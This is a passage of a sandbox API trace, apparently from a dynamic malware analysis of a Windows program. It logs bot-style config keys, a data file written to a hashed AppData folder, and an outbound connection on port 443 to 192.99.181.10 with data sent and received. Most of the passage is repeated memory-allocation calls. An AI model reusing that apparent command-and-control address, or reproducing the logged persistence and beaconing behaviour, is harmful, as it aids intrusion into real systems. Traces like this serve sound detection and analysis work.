[6]=0x41, [7]=0x50))) returned 0x0 [0043.587] _snprintf (in: _Dest=0x18a810, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="8054e6dc-e4db-4147-9938-ada26bf04150") returned 36 [0043.587] strlen (_Str="8054e6dc-e4db-4147-9938-ada26bf04150") returned 0x24 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.588] strlen (_Str="core.plugins_dir") returned 0x10 [0043.588] strlen (_Str="8054e6dc-e4db-4147-9938-ada26bf04150") returned 0x24 [0043.588] strcmp (_Str1="core.plugins_dir", _Str2="core.crash_handler") returned 1 [0043.588] strcmp (_Str1="core.plugins_dir", _Str2="core.installed_file") returned 1 [0043.588] strcmp (_Str1="core.plugins_dir", _Str2="core.restart_cmd") returned -1 [0043.588] strcmp (_Str1="core.plugins_dir", _Str2="core.servers") returned -1 [0043.588] strcmp (_Str1="core.plugins_dir", _Str2="core.cert_fp") returned 1 [0043.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0043.590] WriteFile (in: hFile=0x1fc, lpBuffer=0x2605df0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x18a8c4, lpOverlapped=0x0 | out: lpBuffer=0x2605df0*, lpNumberOfBytesWritten=0x18a8c4*=0x250, lpOverlapped=0x0) returned 1 [0043.590] FlushFileBuffers (hFile=0x1fc) returned 1 [0043.592] CloseHandle (hObject=0x1fc) returned 1 [0043.592] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0043.594] wcslen (_String="8054e6dc-e4db-4147-9938-ada26bf04150") returned 0x24 [0043.594] wcslen (_String="\\") returned 0x1 [0043.594] wcslen (_String="\\") returned 0x1 [0043.594] PathIsDirectoryW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\8054e6dc-e4db-4147-9938-ada26bf04150") returned 0 [0043.595] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\8054e6dc-e4db-4147-9938-ada26bf04150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\8054e6dc-e4db-4147-9938-ada26bf04150"), lpSecurityAttributes=0x0) returned 1 [0043.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\8054e6dc-e4db-4147-9938-ada26bf04150\\38e5d161-f6c8-43ba-9fe8-f1301b7b08b6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\8054e6dc-e4db-4147-9938-ada26bf04150\\38e5d161-f6c8-43ba-9fe8-f1301b7b08b6"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0043.596] strlen (_Str="core") returned 0x4 [0043.596] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x0) returned 0x102 [0043.596] GetCurrentThreadId () returned 0xaac [0043.596] GetCurrentThreadId () returned 0xaac [0043.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x200 [0043.596] PostQueuedCompletionStatus (CompletionPort=0x1e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x260a104) returned 1 [0043.596] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x7530) returned 0x0 [0043.597] CloseHandle (hObject=0x200) returned 1 [0043.597] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0xea60) returned 0x0 [0043.597] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18a7ec | out: lpWSAData=0x18a7ec) returned 0 [0043.600] strlen (_Str=":") returned 0x1 [0043.600] strlen (_Str=":") returned 0x1 [0043.600] strlen (_Str=":") returned 0x1 [0043.600] atoi (_Str="443") returned 443 [0043.600] strlen (_Str="192.99.181.10") returned 0xd [0043.600] strlen (_Str="192.99.181.10") returned 0xd [0043.600] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x214 [0043.629] setsockopt (s=0x214, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0043.629] WSAIoctl (in: s=0x214, dwIoControlCode=0x98000004, lpvInBuffer=0x18a774, cbInBuffer=0xc, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18a780, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18a780, lpOverlapped=0x0) returned 0 [0043.629] inet_addr (cp="192.99.181.10") returned 0xab563c0 [0043.629] inet_addr (cp="192.99.181.10") returned 0xab563c0 [0043.629] htons (hostshort=0x1bb) returned 0xbb01 [0043.629] GetCurrentThreadId () returned 0xaac [0043.629] GetCurrentThreadId () returned 0xaac [0043.629] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x218 [0043.629] PostQueuedCompletionStatus (CompletionPort=0x1e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2605cbc) returned 1 [0043.629] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x7530) returned 0x0 [0043.630] CloseHandle (hObject=0x218) returned 1 [0043.630] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x218 [0043.630] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x224 [0043.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4dd58fc, lpParameter=0x2605b40, dwCreationFlags=0x0, lpThreadId=0x2605b48 | out: lpThreadId=0x2605b48*=0xac4) returned 0x228 [0043.630] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0xffffffff) Thread: id = 34 os_tid = 0xab4 Thread: id = 35 os_tid = 0xab8 Thread: id = 36 os_tid = 0xabc [0043.583] WaitForSingleObject (hHandle=0x1d8, dwMilliseconds=0xdbba0) Thread: id = 37 os_tid = 0xac0 [0043.583] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0043.584] GetCurrentThreadId () returned 0xac0 [0043.584] SetEvent (hEvent=0x1f4) returned 1 [0043.591] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0043.596] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x0) returned 0x102 [0043.596] GetCurrentThreadId () returned 0xac0 [0043.597] SetEvent (hEvent=0x1f8) returned 1 [0043.597] SetEvent (hEvent=0x200) returned 1 [0043.617] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0043.629] GetCurrentThreadId () returned 0xac0 [0043.629] bind (s=0x214, addr=0x516fee0*(sa_family=2, sin_port=0x0, sin_addr=0x0), namelen=16) returned 0 [0043.630] WSAIoctl (in: s=0x214, dwIoControlCode=0xc8000006, lpvInBuffer=0x516fe90, cbInBuffer=0x10, lpvOutBuffer=0x516feb4, cbOutBuffer=0x4, lpcbBytesReturned=0x516feb0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x516feb4, lpcbBytesReturned=0x516feb0, lpOverlapped=0x0) returned 0 [0043.630] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x1e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x1e0 [0043.630] ConnectEx (in: s=0x214, name=0x260a10c*(sa_family=2, sin_port=0x1bb, sin_addr="192.99.181.10"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x0, lpOverlapped=0x260a11c | out: lpSendBuffer=0x0, lpdwBytesSent=0x0) returned 0 [0043.630] GetLastError () returned 0x3e5 [0043.630] SetEvent (hEvent=0x218) returned 1 [0043.631] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0043.861] setsockopt (s=0x214, level=65535, optname=28688, optval=0x0, optlen=0) returned 0 [0043.861] strlen (_Str="192.99.181.10") returned 0xd [0043.862] calloc (_Count=0x1, _Size=0x414d) returned 0x260f698 [0043.862] calloc (_Count=0x1, _Size=0x414d) returned 0x26137f0 [0043.862] calloc (_Count=0x1, _Size=0xd0) returned 0x2617948 [0043.862] calloc (_Count=0x1, _Size=0x88) returned 0x2605cb0 [0043.862] calloc (_Count=0x1, _Size=0x898) returned 0x2617a20 [0043.862] strlen (_Str="192.99.181.10") returned 0xd [0043.862] calloc (_Count=0x1, _Size=0xe) returned 0x26058d8 [0043.862] _time64 (in: _Time=0x0 | out: _Time=0x0) returned 0x5a02087f [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x728241dd [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4c022957 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x38413bc4 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2f26df91 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7a6d73ab [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2393e620 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5e338cbb [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5bedd85e [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x404331a9 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5b4370ac [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2a06d9c4 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x25ff13a0 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x52cc82a3 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x656502a5 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x60415a8a [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x29bb1884 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x69bcae37 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x533dbf37 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x331bc635 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2188754f [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x63f6f323 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1211a059 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2b6a474d [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x462d66b [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5155fa54 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5e3961cb [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3d102b10 [0043.862] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x42f831d9 [0043.862] strlen (_Str="192.99.181.10") returned 0xd [0043.862] GetCurrentThreadId () returned 0xac0 [0043.862] WSASend (in: s=0x214, lpBuffers=0x516fecc*=((len=0x196, buf=0x26182c0*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fecc*=((len=0x196, buf=0x26182c0*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0043.862] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0043.863] GetCurrentThreadId () returned 0xac0 [0043.863] WSARecv (in: s=0x214, lpBuffers=0x516fefc, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fefc*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0043.863] GetLastError () returned 0x3e5 [0043.863] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.098] _time64 (in: _Time=0x0 | out: _Time=0x0) returned 0x5a02087f [0044.098] calloc (_Count=0x1, _Size=0x138) returned 0x2618b30 [0044.098] calloc (_Count=0x1, _Size=0x358) returned 0x2618c70 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x26001c8 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x26001f0 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x2600218 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x2600240 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x2600268 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x2600290 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x26002b8 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x26002e0 [0044.098] calloc (_Count=0x1, _Size=0xac) returned 0x2601b08 [0044.098] calloc (_Count=0x40, _Size=0x4) returned 0x2618fd0 [0044.098] calloc (_Count=0x1, _Size=0x4) returned 0x2fa28 [0044.098] calloc (_Count=0x1, _Size=0x138) returned 0x26190d8 [0044.098] calloc (_Count=0x1, _Size=0x35a) returned 0x2619218 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x2600308 [0044.098] calloc (_Count=0x1, _Size=0x20) returned 0x2600330 [0044.099] calloc (_Count=0x1, _Size=0x20) returned 0x2600358 [0044.099] calloc (_Count=0x1, _Size=0x20) returned 0x2600380 [0044.099] calloc (_Count=0x1, _Size=0x20) returned 0x26003a8 [0044.099] calloc (_Count=0x1, _Size=0x20) returned 0x26003d0 [0044.099] calloc (_Count=0x1, _Size=0xac) returned 0x2601bc0 [0044.099] calloc (_Count=0x40, _Size=0x4) returned 0x2619598 [0044.099] calloc (_Count=0x1, _Size=0x4) returned 0x2fa48 [0044.099] calloc (_Count=0x8, _Size=0x4) returned 0x26003f8 [0044.099] calloc (_Count=0x8, _Size=0x4) returned 0x2600420 [0044.099] calloc (_Count=0x1, _Size=0x4) returned 0x2fa58 [0044.099] calloc (_Count=0x1, _Size=0xd8) returned 0x261b598 [0044.099] calloc (_Count=0x40, _Size=0x4) returned 0x26196a0 [0044.099] calloc (_Count=0x41, _Size=0x4) returned 0x261d598 [0044.099] calloc (_Count=0x41, _Size=0x4) returned 0x261d6b0 [0044.099] calloc (_Count=0x82, _Size=0x4) returned 0x261f580 [0044.099] calloc (_Count=0x1, _Size=0x4) returned 0x2fa68 [0044.099] calloc (_Count=0x81, _Size=0x4) returned 0x261f790 [0044.099] calloc (_Count=0x81, _Size=0x4) returned 0x261f9a0 [0044.099] calloc (_Count=0x40, _Size=0x4) returned 0x26196a0 [0044.099] calloc (_Count=0x83, _Size=0x4) returned 0x261fbb0 [0044.099] calloc (_Count=0x2, _Size=0x4) returned 0x2fa68 [0044.099] calloc (_Count=0x3, _Size=0x4) returned 0x26058f0 [0044.099] calloc (_Count=0x41, _Size=0x4) returned 0x261d7c8 [0044.099] calloc (_Count=0x81, _Size=0x4) returned 0x261fdc8 [0044.099] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x3, _Size=0x4) returned 0x2605908 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x42, _Size=0x4) returned 0x261d7c8 [0044.100] calloc (_Count=0x81, _Size=0x4) returned 0x261ffd8 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.100] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.101] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.102] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.103] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.104] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.105] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.106] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 